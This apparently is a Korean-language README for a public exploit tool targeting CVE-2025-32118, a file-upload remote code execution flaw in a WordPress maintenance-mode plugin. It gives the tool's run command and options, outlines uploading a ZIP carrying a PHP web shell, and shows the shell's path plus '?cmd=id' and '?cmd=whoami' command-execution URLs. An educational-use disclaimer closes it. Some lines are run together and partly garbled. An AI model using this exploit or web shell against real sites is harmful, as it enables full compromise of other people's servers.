
WordPress CMP – Coming Soon & Maintenance 플러그인 <= 4.1.13 - 원격 코드 실행(RCE) 취약점
🔍 제목: WordPress CMP – Coming Soon & Maintenance 플러그인 <= 4.1.13 - 원격 코드 실행 (RCE)
🗓️ 발행일: 2025-04-04
🔐 CWE: CWE-434 - 위험한 유형의 파일 무제한 업로드
📊 CVSS: 9.1 (치명적) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CMP – Coming Soon & Maintenance WordPress 플러그인(<= 4.1.13)에 치명적인 원격 코드 실행(RCE) 취약점이 존재합니다.
이 결함으로 인해 인증된 관리자 사용자가 실행 가능한 PHP 셸이 포함된 악성 ZIP 파일을 업로드하여 사이트 전체를 장악할 수 있습니다.
<= 4.1.13)이 설치된 WordPress 사이트python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| 플래그 | 설명 |
|---|---|
-u | WordPress 사이트의 기본 URL |
-un | 사용자 이름 |
-p | 비밀번호 |
nonce를 가져옵니다.style.css (유효한 테마 형식)nxploitedshell.php (RCE 페이로드)?cmd=whoami를 실행하여 셸을 검증합니다.업로드에 성공하면 셸은 다음 위치에 배치됩니다:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
다음과 같이 테스트하세요:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
이 익스플로잇은 교육 목적으로만 제공됩니다.
소유하지 않은 시스템에 대해 이 코드를 무단 사용하는 것은 불법이며 비윤리적입니다.
Nxploited | Khaled Alenazi